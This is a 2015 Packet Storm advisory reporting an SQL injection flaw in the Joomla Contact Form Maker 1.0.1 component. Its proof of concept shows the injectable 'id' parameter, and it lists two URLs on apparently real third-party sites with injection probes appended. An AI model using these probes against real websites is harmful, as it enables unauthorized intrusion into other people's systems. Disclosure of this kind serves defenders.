Joomla Contact Form Maker 1.0.1 SQL Injection

2015-03-29T00:00:00
ID PACKETSTORM:131163
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2015-03-29T00:00:00

Description

                                        
                                            `[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability  
[+]Author: TUNISIAN CYBER  
[+]Date: 29/03/2015  
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker  
[+]Type:WebApp  
[+]Risk:High  
[+]Overview:  
Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability.  
  
[+]Proof Of Concept:  
  
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL  
  
  
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27  
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'  
`